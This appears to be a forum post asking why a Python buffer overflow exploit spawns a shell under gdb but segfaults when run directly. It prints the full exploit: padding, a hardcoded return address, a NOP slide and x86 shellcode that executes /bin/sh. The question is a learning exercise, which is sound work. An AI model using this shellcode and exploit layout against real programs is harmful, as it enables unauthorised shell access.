I'm trying to implement a buffer overflow attack and get the shell access. For generating the exploited input my python file is as follows:
import struct
padding = "A"*160
eip = struct.pack("I", 0xffffcd70)
nopslide = "\x90"*100
payload = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
print padding+eip+nopslide+payload
Let's say, I store the output of the python script in a file named exp.
Now, when I run the vulnerable program in gdb, with r < exp, I get
process 190136 is executing new program: /usr/bin/dash
[Inferior 1 (process 190136) exited normally]
But when, I run the program without gdb, for e.g. like python exploit.py | ./vuln I get a segmentation fault.
Any clues on what I'm doing wrong, and why the program works in gdb but not without it.
[link] [comments]
from hacking: security in practice https://ift.tt/6m7RMOA
Comments
Post a Comment